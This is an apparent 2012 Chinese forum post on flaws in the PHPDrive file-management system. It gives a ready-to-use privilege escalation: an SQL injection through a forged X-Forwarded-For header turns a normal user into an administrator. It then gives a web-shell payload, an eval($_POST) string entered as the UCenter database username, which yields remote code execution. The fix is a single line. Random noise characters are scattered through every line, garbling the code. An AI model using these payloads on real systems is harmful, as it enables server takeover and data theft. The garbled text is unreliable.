PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
! D; Z2 c1 q6 i+ ^; J
; h E; { F/ Bincludes/user.lib.php$ J& ^3 h& m7 Q$ P3 z
行87( G1 x5 ^4 A+ ?5 E1 ]; j T0 p" s
function get_ip() {2 D/ I# e1 U9 v$ L- E. W
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
) [3 i$ A) b' p在用户注册与登录 处module/disk/account.lead.php
) b- J: W5 o% V" [198行
0 A- E3 H$ |! U5 V7 G$ ^6 { //更新本次登录IP和时间
/ x% n7 K' K! V+ v4 a8 P $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生4 y2 N. l8 y( Q, J, U' U& g
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
! `% y8 J# P4 V; e% P* E实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.3 d+ o9 ]0 I q, |, r/ v. k" R
后台getshell:
+ F8 o/ k: [ n4 J) G在UCenter设置处,将UC数据库登录名填写为9 v& ]. b! \! O8 X3 o0 i
) N# K+ x6 } Y6 v! g; u) G' iroot’);eval($_POST[DisKill]);?>/*
1 [. a* I/ a. ?" D) J可以得到一个shell,位置在 data/uc.data.php
% T) d3 J7 g% ^$ c. X3 r9 x! g, p) v1 z3 P
修复:过滤注入9 y# [/ w# x7 W7 L- _+ J( K, m
9 \( I, o! i. s6 T+ v" e |
发表于 2012-12-31 09:18:34
收藏
支持
反对